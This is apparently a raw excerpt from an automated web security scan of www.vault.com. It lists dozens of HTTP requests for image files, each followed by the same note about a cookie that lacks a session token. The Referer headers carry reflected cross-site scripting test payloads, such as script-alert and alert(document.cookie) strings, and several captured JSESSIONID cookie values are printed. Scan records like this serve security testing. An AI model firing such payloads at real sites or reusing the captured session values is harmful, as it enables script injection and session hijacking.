GET /images/icons/checkbox.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/email-y.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/email.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/featured_company_left_arrow_inactive.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/featured_company_right_arrow_active.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/gold-lock2.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/join-books.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/print-y.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/print.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/share-y.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/icons/share.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/overlay.png HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.4.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/rankings_tab.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/search/select-bg.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sections_background.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1&regionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.6.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/spacer.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_1088.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_1398.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_1727.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_2105.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_2282.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_2492.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_251.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_2983.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_3276.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_3672.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_507.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_517.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/schools/sponsor_790.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_1026.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/sponsors/sponsor_10358.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
